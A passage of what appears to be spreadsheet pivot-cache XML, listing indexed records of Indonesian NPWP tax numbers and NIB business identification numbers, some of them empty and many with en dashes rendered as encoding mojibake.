  </r>
  <r>
    <x v="1307"/>
    <s v="nib"/>
    <n v="9120204121818"/>
  </r>
  <r>
    <x v="1308"/>
    <s v="npwp"/>
    <s v="86‚Äì338‚Äì885‚Äì6‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1308"/>
    <s v="nib"/>
    <n v="8120210022746"/>
  </r>
  <r>
    <x v="1309"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1309"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1310"/>
    <s v="npwp"/>
    <s v="31‚Äì280‚Äì264‚Äì8‚Äì805‚Äì001"/>
  </r>
  <r>
    <x v="1310"/>
    <s v="nib"/>
    <n v="8120216270175"/>
  </r>
  <r>
    <x v="1311"/>
    <s v="npwp"/>
    <s v="02‚Äì005‚Äì455‚Äì7‚Äì823‚Äì001"/>
  </r>
  <r>
    <x v="1311"/>
    <s v="nib"/>
    <n v="8120000762418"/>
  </r>
  <r>
    <x v="1312"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1313"/>
    <s v="npwp"/>
    <s v="02‚Äì483‚Äì865‚Äì8‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1313"/>
    <s v="nib"/>
    <n v="9120104340811"/>
  </r>
  <r>
    <x v="1314"/>
    <s v="npwp"/>
    <s v="86‚Äì956‚Äì896‚Äì4‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1314"/>
    <s v="nib"/>
    <n v="9120106180141"/>
  </r>
  <r>
    <x v="1315"/>
    <s v="npwp"/>
    <s v="01‚Äì083‚Äì032‚Äì1‚Äì631‚Äì000"/>
  </r>
  <r>
    <x v="1315"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1316"/>
    <s v="npwp"/>
    <s v="84‚Äì596‚Äì107‚Äì7‚Äì124‚Äì000"/>
  </r>
  <r>
    <x v="1316"/>
    <s v="nib"/>
    <n v="9120104132753"/>
  </r>
  <r>
    <x v="1317"/>
    <s v="npwp"/>
    <s v="03‚Äì319‚Äì369‚Äì9‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="1317"/>
    <s v="nib"/>
    <n v="8120001850294"/>
  </r>
  <r>
    <x v="1318"/>
    <s v="npwp"/>
    <s v="16‚Äì778‚Äì987‚Äì4‚Äì315‚Äì000"/>
  </r>
  <r>
    <x v="1318"/>
    <s v="nib"/>
    <n v="1261000472538"/>
  </r>
  <r>
    <x v="1319"/>
    <s v="npwp"/>
    <s v="86‚Äì234‚Äì067‚Äì6‚Äì727‚Äì000"/>
  </r>
  <r>
    <x v="1319"/>
    <s v="nib"/>
    <n v="8120110171098"/>
  </r>
  <r>
    <x v="1320"/>
    <s v="npwp"/>
    <s v="90‚Äì087‚Äì412‚Äì4‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1320"/>
    <s v="nib"/>
    <n v="9120006151507"/>
  </r>
  <r>
    <x v="1321"/>
    <s v="npwp"/>
    <s v="02‚Äì831‚Äì077‚Äì9‚Äì014‚Äì000"/>
  </r>
  <r>
    <x v="1321"/>
    <s v="nib"/>
    <n v="8120102991644"/>
  </r>
  <r>
    <x v="1322"/>
    <s v="npwp"/>
    <s v="01‚Äì100‚Äì476‚Äì9‚Äì041‚Äì001"/>
  </r>
  <r>
    <x v="1322"/>
    <s v="nib"/>
    <n v="8120004872553"/>
  </r>
  <r>
    <x v="1323"/>
    <s v="npwp"/>
    <s v="76‚Äì331‚Äì536‚Äì3‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1323"/>
    <s v="nib"/>
    <n v="8120116031707"/>
  </r>
  <r>
    <x v="1324"/>
    <s v="npwp"/>
    <s v="02‚Äì851‚Äì463‚Äì6‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1324"/>
    <s v="nib"/>
    <n v="8120119221421"/>
  </r>
  <r>
    <x v="1325"/>
    <s v="npwp"/>
    <s v="03‚Äì051‚Äì668‚Äì6‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1325"/>
    <s v="nib"/>
    <n v="9120203261115"/>
  </r>
  <r>
    <x v="1326"/>
    <s v="npwp"/>
    <s v="02‚Äì938‚Äì499‚Äì7‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="1326"/>
    <s v="nib"/>
    <n v="8120003850772"/>
  </r>
  <r>
    <x v="1327"/>
    <s v="npwp"/>
    <s v="85‚Äì183‚Äì011‚Äì7‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1327"/>
    <s v="nib"/>
    <n v="8120001971153"/>
  </r>
  <r>
    <x v="1328"/>
    <s v="npwp"/>
    <s v="77‚Äì517‚Äì092‚Äì1‚Äì404‚Äì000"/>
  </r>
  <r>
    <x v="1328"/>
    <s v="nib"/>
    <n v="9120301103004"/>
  </r>
  <r>
    <x v="1329"/>
    <s v="npwp"/>
    <s v="02‚Äì255‚Äì688‚Äì0‚Äì645‚Äì000"/>
  </r>
  <r>
    <x v="1329"/>
    <s v="nib"/>
    <n v="9120600782231"/>
  </r>
  <r>
    <x v="1330"/>
    <s v="npwp"/>
    <s v="01‚Äì425‚Äì188‚Äì8‚Äì609‚Äì000"/>
  </r>
  <r>
    <x v="1330"/>
    <s v="nib"/>
    <n v="9120217071281"/>
  </r>
  <r>
    <x v="1331"/>
    <s v="npwp"/>
    <s v="49‚Äì741‚Äì176‚Äì9‚Äì911‚Äì000"/>
  </r>
  <r>
    <x v="1332"/>
    <s v="npwp"/>
    <s v="06‚Äì098‚Äì063‚Äì8‚Äì213‚Äì000"/>
  </r>
  <r>
    <x v="1332"/>
    <s v="nib"/>
    <n v="91200021136"/>
  </r>
  <r>
    <x v="1333"/>
    <s v="npwp"/>
    <s v="84‚Äì856‚Äì148‚Äì6‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1333"/>
    <s v="nib"/>
    <n v="9120102160188"/>
  </r>
  <r>
    <x v="1334"/>
    <s v="npwp"/>
    <s v="03‚Äì175‚Äì328‚Äì8‚Äì727‚Äì000"/>
  </r>
  <r>
    <x v="1335"/>
    <s v="npwp"/>
    <s v="06‚Äì000‚Äì406‚Äì6‚Äì113‚Äì000"/>
  </r>
  <r>
    <x v="1335"/>
    <s v="nib"/>
    <n v="9120109200282"/>
  </r>
  <r>
    <x v="1336"/>
    <s v="npwp"/>
    <s v="84‚Äì856‚Äì148‚Äì6‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1336"/>
    <s v="nib"/>
    <n v="9120102160188"/>
  </r>
  <r>
    <x v="1337"/>
    <s v="npwp"/>
    <s v="01‚Äì686‚Äì270‚Äì8‚Äì044‚Äì000"/>
  </r>
  <r>
    <x v="1337"/>
    <s v="nib"/>
    <n v="8120002962955"/>
  </r>
  <r>
    <x v="1338"/>
    <s v="npwp"/>
    <s v="02‚Äì817‚Äì282‚Äì3‚Äì613‚Äì000"/>
  </r>
  <r>
    <x v="1338"/>
    <s v="nib"/>
    <n v="8120111171369"/>
  </r>
  <r>
    <x v="1339"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1339"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1340"/>
    <s v="npwp"/>
    <s v="74‚Äì244‚Äì720‚Äì4‚Äì507‚Äì001"/>
  </r>
  <r>
    <x v="1340"/>
    <s v="nib"/>
    <n v="8120119201316"/>
  </r>
  <r>
    <x v="1341"/>
    <s v="npwp"/>
    <s v="01‚Äì148‚Äì487‚Äì0‚Äì054‚Äì000"/>
  </r>
  <r>
    <x v="1341"/>
    <s v="nib"/>
    <n v="8120008802502"/>
  </r>
  <r>
    <x v="1342"/>
    <s v="npwp"/>
    <s v="82‚Äì714‚Äì616‚Äì8‚Äì026‚Äì000"/>
  </r>
  <r>
    <x v="1342"/>
    <s v="nib"/>
    <n v="8120001891402"/>
  </r>
  <r>
    <x v="1343"/>
    <s v="npwp"/>
    <s v="01‚Äì744‚Äì272‚Äì4‚Äì046‚Äì000"/>
  </r>
  <r>
    <x v="1343"/>
    <s v="nib"/>
    <n v="8120007762971"/>
  </r>
  <r>
    <x v="1344"/>
    <s v="npwp"/>
    <s v="04‚Äì021‚Äì168‚Äì2‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1344"/>
    <s v="nib"/>
    <n v="9120302102849"/>
  </r>
  <r>
    <x v="1345"/>
    <s v="npwp"/>
    <s v="01‚Äì546‚Äì089‚Äì2‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1345"/>
    <s v="nib"/>
    <n v="9120305110493"/>
  </r>
  <r>
    <x v="1346"/>
    <s v="npwp"/>
    <s v="02‚Äì968‚Äì292‚Äì9‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="1346"/>
    <s v="nib"/>
    <n v="8120100852783"/>
  </r>
  <r>
    <x v="1347"/>
    <s v="npwp"/>
    <s v="25‚Äì913‚Äì362‚Äì7‚Äì513‚Äì000"/>
  </r>
  <r>
    <x v="1347"/>
    <s v="nib"/>
    <n v="9120107191967"/>
  </r>
  <r>
    <x v="1348"/>
    <s v="npwp"/>
    <s v="01.592.618.1-801.001"/>
  </r>
  <r>
    <x v="1348"/>
    <s v="nib"/>
    <n v="8120113251993"/>
  </r>
  <r>
    <x v="1349"/>
    <s v="npwp"/>
    <s v="72‚Äì072‚Äì170‚Äì3‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="1349"/>
    <s v="nib"/>
    <n v="9120200230376"/>
  </r>
  <r>
    <x v="1350"/>
    <s v="npwp"/>
    <s v="01‚Äì100‚Äì476‚Äì9‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1350"/>
    <s v="nib"/>
    <n v="8120004872553"/>
  </r>
  <r>
    <x v="1351"/>
    <s v="npwp"/>
    <s v="02‚Äì051‚Äì630‚Äì8‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1351"/>
    <s v="nib"/>
    <n v="8120110242389"/>
  </r>
  <r>
    <x v="1352"/>
    <s v="npwp"/>
    <s v="02‚Äì385‚Äì382‚Äì3‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="1352"/>
    <s v="nib"/>
    <n v="9120101281722"/>
  </r>
  <r>
    <x v="1353"/>
    <s v="npwp"/>
    <s v="06‚Äì481‚Äì279‚Äì5‚Äì623‚Äì000"/>
  </r>
  <r>
    <x v="1353"/>
    <s v="nib"/>
    <n v="8120016270476"/>
  </r>
  <r>
    <x v="1354"/>
    <s v="npwp"/>
    <s v="02‚Äì889‚Äì386‚Äì5‚Äì126‚Äì000"/>
  </r>
  <r>
    <x v="1354"/>
    <s v="nib"/>
    <n v="9120005270692"/>
  </r>
  <r>
    <x v="1355"/>
    <s v="npwp"/>
    <s v="54‚Äì349‚Äì780‚Äì4‚Äì824‚Äì000"/>
  </r>
  <r>
    <x v="1355"/>
    <s v="nib"/>
    <n v="9120500793401"/>
  </r>
  <r>
    <x v="1356"/>
    <s v="npwp"/>
    <s v="03‚Äì040‚Äì306‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1356"/>
    <s v="nib"/>
    <n v="9120207162099"/>
  </r>
  <r>
    <x v="1357"/>
    <s v="npwp"/>
    <s v="01‚Äì772‚Äì284‚Äì4‚Äì038‚Äì000"/>
  </r>
  <r>
    <x v="1357"/>
    <s v="nib"/>
    <n v="8120107772376"/>
  </r>
  <r>
    <x v="1358"/>
    <s v="npwp"/>
    <s v="97‚Äì321‚Äì505‚Äì6‚Äì036‚Äì000"/>
  </r>
  <r>
    <x v="1358"/>
    <s v="nib"/>
    <n v="9120400200465"/>
  </r>
  <r>
    <x v="1359"/>
    <s v="npwp"/>
    <s v="01‚Äì001‚Äì671‚Äì5‚Äì601‚Äì001"/>
  </r>
  <r>
    <x v="1359"/>
    <s v="nib"/>
    <n v="91202001141153"/>
  </r>
  <r>
    <x v="1360"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1360"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1361"/>
    <s v="npwp"/>
    <s v="84‚Äì101‚Äì983‚Äì9‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="1361"/>
    <s v="nib"/>
    <n v="8120208912576"/>
  </r>
  <r>
    <x v="1362"/>
    <s v="npwp"/>
    <s v="80‚Äì514‚Äì781‚Äì6‚Äì447‚Äì000"/>
  </r>
  <r>
    <x v="1362"/>
    <s v="nib"/>
    <n v="9120302102254"/>
  </r>
  <r>
    <x v="1363"/>
    <s v="npwp"/>
    <s v="90‚Äì359‚Äì438‚Äì0‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="1363"/>
    <s v="nib"/>
    <n v="9120008200118"/>
  </r>
  <r>
    <x v="1364"/>
    <s v="npwp"/>
    <s v="02‚Äì192‚Äì987‚Äì2‚Äì405‚Äì000"/>
  </r>
  <r>
    <x v="1364"/>
    <s v="nib"/>
    <n v="9120406251018"/>
  </r>
  <r>
    <x v="1365"/>
    <s v="npwp"/>
    <s v="01‚Äì772‚Äì284‚Äì4‚Äì038‚Äì000"/>
  </r>
  <r>
    <x v="1365"/>
    <s v="nib"/>
    <n v="8120107772376"/>
  </r>
  <r>
    <x v="1366"/>
    <s v="npwp"/>
    <s v="01‚Äì592‚Äì149‚Äì7‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="1366"/>
    <s v="nib"/>
    <n v="8120101941149"/>
  </r>
  <r>
    <x v="1367"/>
    <s v="npwp"/>
    <s v="04‚Äì121‚Äì903‚Äì1‚Äì426‚Äì000"/>
  </r>
  <r>
    <x v="1367"/>
    <s v="nib"/>
    <n v="9120207370811"/>
  </r>
  <r>
    <x v="1368"/>
    <s v="npwp"/>
    <s v="84‚Äì189‚Äì904‚Äì0‚Äì225‚Äì000"/>
  </r>
  <r>
    <x v="1368"/>
    <s v="nib"/>
    <n v="258010140016"/>
  </r>
  <r>
    <x v="1369"/>
    <s v="npwp"/>
    <s v="72‚Äì560‚Äì647‚Äì9‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="1369"/>
    <s v="nib"/>
    <n v="8120003920171"/>
  </r>
  <r>
    <x v="1370"/>
    <s v="npwp"/>
    <s v="03‚Äì154‚Äì479‚Äì4‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1370"/>
    <s v="nib"/>
    <n v="8120001970582"/>
  </r>
  <r>
    <x v="1371"/>
    <s v="npwp"/>
    <s v="14‚Äì180‚Äì399‚Äì9‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1371"/>
    <s v="nib"/>
    <n v="8120011211464"/>
  </r>
  <r>
    <x v="1372"/>
    <s v="npwp"/>
    <s v="03‚Äì259‚Äì755‚Äì1‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1372"/>
    <s v="nib"/>
    <n v="9120404391947"/>
  </r>
  <r>
    <x v="1373"/>
    <s v="npwp"/>
    <s v="73‚Äì801‚Äì600‚Äì5‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="1373"/>
    <s v="nib"/>
    <n v="9120005642906"/>
  </r>
  <r>
    <x v="1374"/>
    <s v="npwp"/>
    <s v="16‚Äì815‚Äì506‚Äì7‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="1375"/>
    <s v="npwp"/>
    <s v="83‚Äì044‚Äì995‚Äì5‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1375"/>
    <s v="nib"/>
    <n v="9120203261734"/>
  </r>
  <r>
    <x v="1376"/>
    <s v="npwp"/>
    <s v="01‚Äì412‚Äì254‚Äì3‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1376"/>
    <s v="nib"/>
    <n v="9120005172241"/>
  </r>
  <r>
    <x v="1377"/>
    <s v="npwp"/>
    <s v="02‚Äì557‚Äì692‚Äì7‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1377"/>
    <s v="nib"/>
    <n v="9120201162348"/>
  </r>
  <r>
    <x v="1378"/>
    <s v="npwp"/>
    <s v="80‚Äì141‚Äì759‚Äì3‚Äì905‚Äì000"/>
  </r>
  <r>
    <x v="1378"/>
    <s v="nib"/>
    <n v="8120013131862"/>
  </r>
  <r>
    <x v="1379"/>
    <s v="npwp"/>
    <s v="01‚Äì777‚Äì129‚Äì6‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="1379"/>
    <s v="nib"/>
    <n v="8120003752084"/>
  </r>
  <r>
    <x v="1380"/>
    <s v="npwp"/>
    <s v="31‚Äì218‚Äì606‚Äì7‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="1380"/>
    <s v="nib"/>
    <n v="8120008892019"/>
  </r>
  <r>
    <x v="1381"/>
    <s v="npwp"/>
    <s v="84‚Äì197‚Äì287‚Äì0‚Äì912‚Äì000"/>
  </r>
  <r>
    <x v="1381"/>
    <s v="nib"/>
    <n v="9120108170039"/>
  </r>
  <r>
    <x v="1382"/>
    <s v="npwp"/>
    <s v="70‚Äì594‚Äì656‚Äì4‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="1382"/>
    <s v="nib"/>
    <n v="8120105811004"/>
  </r>
  <r>
    <x v="1383"/>
    <s v="npwp"/>
    <s v="85‚Äì488‚Äì117‚Äì4‚Äì724‚Äì000"/>
  </r>
  <r>
    <x v="1383"/>
    <s v="nib"/>
    <n v="9120002882349"/>
  </r>
  <r>
    <x v="1384"/>
    <s v="npwp"/>
    <s v="01‚Äì824‚Äì589‚Äì4‚Äì059‚Äì000"/>
  </r>
  <r>
    <x v="1384"/>
    <s v="nib"/>
    <n v="8120017201493"/>
  </r>
  <r>
    <x v="1385"/>
    <s v="npwp"/>
    <s v="90‚Äì359‚Äì438‚Äì0‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="1385"/>
    <s v="nib"/>
    <n v="9120008200118"/>
  </r>
  <r>
    <x v="1386"/>
    <s v="npwp"/>
    <s v="31‚Äì238‚Äì954‚Äì7‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="1386"/>
    <s v="nib"/>
    <n v="8120103822443"/>
  </r>
  <r>
    <x v="1387"/>
    <s v="npwp"/>
    <s v="07‚Äì091‚Äì904‚Äì8‚Äì518‚Äì000"/>
  </r>
  <r>
    <x v="1388"/>
    <s v="npwp"/>
    <s v="02‚Äì798‚Äì006‚Äì9‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="1388"/>
    <s v="nib"/>
    <n v="8120003971653"/>
  </r>
  <r>
    <x v="1389"/>
    <s v="npwp"/>
    <s v="02‚Äì557‚Äì692‚Äì7‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1389"/>
    <s v="nib"/>
    <n v="9120201162348"/>
  </r>
  <r>
    <x v="1390"/>
    <s v="npwp"/>
    <s v="59‚Äì848‚Äì676‚Äì9‚Äì911‚Äì001"/>
  </r>
  <r>
    <x v="1390"/>
    <s v="nib"/>
    <n v="9120001820437"/>
  </r>
  <r>
    <x v="1391"/>
    <s v="npwp"/>
    <s v="01‚Äì567‚Äì141‚Äì0‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="1392"/>
    <s v="npwp"/>
    <s v="01‚Äì537‚Äì427‚Äì5‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1392"/>
    <s v="nib"/>
    <n v="9120300830069"/>
  </r>
  <r>
    <x v="1393"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1393"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1394"/>
    <s v="npwp"/>
    <s v="01‚Äì533‚Äì810‚Äì6‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="1394"/>
    <s v="nib"/>
    <n v="8120001902055"/>
  </r>
  <r>
    <x v="1395"/>
    <s v="npwp"/>
    <s v="78‚Äì655‚Äì804‚Äì9‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1395"/>
    <s v="nib"/>
    <n v="9120007131192"/>
  </r>
  <r>
    <x v="1396"/>
    <s v="npwp"/>
    <s v="02‚Äì973‚Äì569‚Äì5‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="1397"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì123‚Äì001"/>
  </r>
  <r>
    <x v="1397"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="1398"/>
    <s v="npwp"/>
    <s v="21‚Äì123‚Äì122‚Äì0‚Äì401‚Äì000"/>
  </r>
  <r>
    <x v="1398"/>
    <s v="nib"/>
    <n v="8120316002347"/>
  </r>
  <r>
    <x v="1399"/>
    <s v="npwp"/>
    <s v="87‚Äì919‚Äì147‚Äì6‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1399"/>
    <s v="nib"/>
    <n v="9120006171985"/>
  </r>
  <r>
    <x v="1400"/>
    <s v="npwp"/>
    <s v="01‚Äì109‚Äì114‚Äì7‚Äì616‚Äì000"/>
  </r>
  <r>
    <x v="1400"/>
    <s v="nib"/>
    <n v="9120301701109"/>
  </r>
  <r>
    <x v="1401"/>
    <s v="npwp"/>
    <s v="31‚Äì438‚Äì579‚Äì0‚Äì416‚Äì000"/>
  </r>
  <r>
    <x v="1401"/>
    <s v="nib"/>
    <n v="8120007812289"/>
  </r>
  <r>
    <x v="1402"/>
    <s v="npwp"/>
    <s v="75‚Äì545‚Äì429‚Äì5‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="1402"/>
    <s v="nib"/>
    <n v="8120014043007"/>
  </r>
  <r>
    <x v="1403"/>
    <s v="npwp"/>
    <s v="02‚Äì178‚Äì516‚Äì7‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="1403"/>
    <s v="nib"/>
    <n v="8120116262085"/>
  </r>
  <r>
    <x v="1404"/>
    <s v="npwp"/>
    <s v="85‚Äì754‚Äì782‚Äì2‚Äì424‚Äì000"/>
  </r>
  <r>
    <x v="1404"/>
    <s v="nib"/>
    <n v="8120012180156"/>
  </r>
  <r>
    <x v="1405"/>
    <s v="npwp"/>
    <s v="85‚Äì820‚Äì886‚Äì1‚Äì424‚Äì000"/>
  </r>
  <r>
    <x v="1405"/>
    <s v="nib"/>
    <n v="8120012180156"/>
  </r>
  <r>
    <x v="1406"/>
    <s v="npwp"/>
    <s v="44‚Äì337‚Äì562‚Äì1‚Äì501‚Äì000"/>
  </r>
  <r>
    <x v="1407"/>
    <s v="npwp"/>
    <s v="01‚Äì948‚Äì219‚Äì9‚Äì308‚Äì000"/>
  </r>
  <r>
    <x v="1407"/>
    <s v="nib"/>
    <n v="8120308870615"/>
  </r>
  <r>
    <x v="1408"/>
    <s v="npwp"/>
    <s v="02‚Äì284‚Äì941‚Äì8‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1408"/>
    <s v="nib"/>
    <n v="8120006772701"/>
  </r>
  <r>
    <x v="1409"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1409"/>
    <s v="nib"/>
    <n v="8120114231371"/>
  </r>
  <r>
    <x v="1410"/>
    <s v="npwp"/>
    <s v="01‚Äì454‚Äì019‚Äì9‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="1410"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="1411"/>
    <s v="npwp"/>
    <s v="82‚Äì830‚Äì390‚Äì9‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="1411"/>
    <s v="nib"/>
    <n v="8120009712865"/>
  </r>
  <r>
    <x v="1412"/>
    <s v="npwp"/>
    <s v="01‚Äì001‚Äì671‚Äì5‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="1412"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="1413"/>
    <s v="npwp"/>
    <s v="03‚Äì047‚Äì598‚Äì2‚Äì805‚Äì001"/>
  </r>
  <r>
    <x v="1413"/>
    <s v="nib"/>
    <n v="8120315192597"/>
  </r>
  <r>
    <x v="1414"/>
    <s v="npwp"/>
    <s v="74‚Äì387‚Äì948‚Äì8‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1414"/>
    <s v="nib"/>
    <n v="9120006201097"/>
  </r>
  <r>
    <x v="1415"/>
    <s v="npwp"/>
    <s v="86‚Äì750‚Äì458‚Äì1‚Äì811‚Äì000"/>
  </r>
  <r>
    <x v="1415"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1416"/>
    <s v="npwp"/>
    <s v="02‚Äì182‚Äì015‚Äì4‚Äì431‚Äì000"/>
  </r>
  <r>
    <x v="1416"/>
    <s v="nib"/>
    <n v="812000489"/>
  </r>
  <r>
    <x v="1417"/>
    <s v="npwp"/>
    <s v="84‚Äì546‚Äì919‚Äì6‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="1417"/>
    <s v="nib"/>
    <n v="8120202902058"/>
  </r>
  <r>
    <x v="1418"/>
    <s v="npwp"/>
    <s v="01‚Äì335‚Äì760‚Äì3‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1418"/>
    <s v="nib"/>
    <n v="8120215220562"/>
  </r>
  <r>
    <x v="1419"/>
    <s v="npwp"/>
    <s v="01‚Äì135‚Äì462‚Äì8‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1419"/>
    <s v="nib"/>
    <n v="8120010052578"/>
  </r>
  <r>
    <x v="1420"/>
    <s v="npwp"/>
    <s v="95.727.121.6-112.000"/>
  </r>
  <r>
    <x v="1420"/>
    <s v="nib"/>
    <n v="220406812856"/>
  </r>
  <r>
    <x v="1421"/>
    <s v="npwp"/>
    <s v="15‚Äì368‚Äì333‚Äì9‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1421"/>
    <s v="nib"/>
    <n v="8120119071503"/>
  </r>
  <r>
    <x v="1422"/>
    <s v="npwp"/>
    <s v="16‚Äì644‚Äì605‚Äì4‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1422"/>
    <s v="nib"/>
    <n v="8120012221859"/>
  </r>
  <r>
    <x v="1423"/>
    <s v="npwp"/>
    <s v="01‚Äì272‚Äì337‚Äì5‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1423"/>
    <s v="nib"/>
    <n v="8120312172015"/>
  </r>
  <r>
    <x v="1424"/>
    <s v="npwp"/>
    <s v="66‚Äì569‚Äì558‚Äì1‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="1424"/>
    <s v="nib"/>
    <n v="9120304230146"/>
  </r>
  <r>
    <x v="1425"/>
    <s v="npwp"/>
    <s v="04‚Äì016‚Äì569‚Äì8‚Äì901‚Äì000"/>
  </r>
  <r>
    <x v="1425"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1426"/>
    <s v="npwp"/>
    <s v="84‚Äì601‚Äì190‚Äì6‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1426"/>
    <s v="nib"/>
    <n v="8120112022196"/>
  </r>
  <r>
    <x v="1427"/>
    <s v="npwp"/>
    <s v="76‚Äì805‚Äì431‚Äì4‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1427"/>
    <s v="nib"/>
    <n v="9120006171985"/>
  </r>
  <r>
    <x v="1428"/>
    <s v="npwp"/>
    <s v="81‚Äì453‚Äì749‚Äì4‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1428"/>
    <s v="nib"/>
    <n v="8120201942063"/>
  </r>
  <r>
    <x v="1429"/>
    <s v="npwp"/>
    <s v="01‚Äì429‚Äì465‚Äì6‚Äì615‚Äì000"/>
  </r>
  <r>
    <x v="1429"/>
    <s v="nib"/>
    <n v="8120003851207"/>
  </r>
  <r>
    <x v="1430"/>
    <s v="npwp"/>
    <s v="71‚Äì178‚Äì422‚Äì3‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1430"/>
    <s v="nib"/>
    <n v="9120101121678"/>
  </r>
  <r>
    <x v="1431"/>
    <s v="npwp"/>
    <s v="02‚Äì690‚Äì360‚Äì9‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1431"/>
    <s v="nib"/>
    <n v="9120404311439"/>
  </r>
  <r>
    <x v="1432"/>
    <s v="npwp"/>
    <n v="251023107545000"/>
  </r>
  <r>
    <x v="1432"/>
    <s v="nib"/>
    <n v="8120013181755"/>
  </r>
  <r>
    <x v="1433"/>
    <s v="npwp"/>
    <s v="88‚Äì134‚Äì245‚Äì5‚Äì501‚Äì000"/>
  </r>
  <r>
    <x v="1433"/>
    <s v="nib"/>
    <n v="9120305361345"/>
  </r>
  <r>
    <x v="1434"/>
    <s v="npwp"/>
    <s v="66‚Äì447‚Äì629‚Äì8‚Äì006‚Äì000"/>
  </r>
  <r>
    <x v="1434"/>
    <s v="nib"/>
    <n v="9120303281311"/>
  </r>
  <r>
    <x v="1435"/>
    <s v="nib"/>
    <n v="8120013130984"/>
  </r>
  <r>
    <x v="1436"/>
    <s v="npwp"/>
    <s v="71‚Äì585‚Äì177‚Äì0‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="1436"/>
    <s v="nib"/>
    <n v="9120100202183"/>
  </r>
  <r>
    <x v="1437"/>
    <s v="npwp"/>
    <s v="80‚Äì655‚Äì506‚Äì6‚Äì061‚Äì000"/>
  </r>
  <r>
    <x v="1437"/>
    <s v="nib"/>
    <n v="8120000741729"/>
  </r>
  <r>
    <x v="1438"/>
    <s v="npwp"/>
    <s v="01‚Äì584‚Äì427‚Äì7‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1438"/>
    <s v="nib"/>
    <n v="9120501152328"/>
  </r>
  <r>
    <x v="1439"/>
    <s v="npwp"/>
    <s v="74‚Äì387‚Äì948‚Äì8‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1439"/>
    <s v="nib"/>
    <n v="9120006201097"/>
  </r>
  <r>
